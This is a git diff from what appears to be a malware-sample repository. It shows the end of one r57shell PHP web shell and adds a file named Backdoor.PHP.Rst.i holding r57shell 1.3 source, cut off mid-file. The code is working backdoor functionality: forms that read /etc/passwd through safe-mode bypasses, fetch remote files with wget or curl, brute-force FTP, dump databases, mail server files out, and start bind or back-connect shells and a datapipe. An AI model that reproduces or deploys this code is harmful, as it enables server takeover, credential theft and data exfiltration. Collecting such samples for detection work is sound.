sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Rst.i b/PHP/Backdoor.PHP.Rst.i new file mode 100644 index 00000000..5d7c576c --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.i @@ -0,0 +1,2121 @@ +<?php +$language='ru'; +$auth = 0; +$name='ec371748dc2da624b35a4f8f685dd122'; +$pass='ec371748dc2da624b35a4f8f685dd122'; +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.3"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="hi"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b>Access Denied</b>"); + } +} +$head = ' +<html> +<head> +<title>r57shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;} +td {BORDER-RIGHT: #aaaaaa 1px solid;BORDER-TOP: #eeeeee 1px solid;BORDER-LEFT: #eeeeee 1px solid;BORDER-BOTTOM: #aaaaaa 1px solid;} +.table1 {BORDER-RIGHT: #cccccc 0px;BORDER-TOP: #cccccc 0px;BORDER-LEFT: #cccccc 0px;BORDER-BOTTOM: #cccccc 0px;BACKGROUND-COLOR: #D4D0C8;} +.td1 {BORDER-RIGHT: #cccccc 0px;BORDER-TOP: #cccccc 0px;BORDER-LEFT: #cccccc 0px;BORDER-BOTTOM: #cccccc 0px;font: 7pt Verdana;} +.tr1 {BORDER-RIGHT: #cccccc 0px;BORDER-TOP: #cccccc 0px;BORDER-LEFT: #cccccc 0px;BORDER-BOTTOM: #cccccc 0px;} +table {BORDER-RIGHT: #eeeeee 1px outset;BORDER-TOP: #eeeeee 1px outset;BORDER-LEFT: #eeeeee 1px outset;BORDER-BOTTOM: #eeeeee 1px outset;BACKGROUND-COLOR: #D4D0C8;} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if 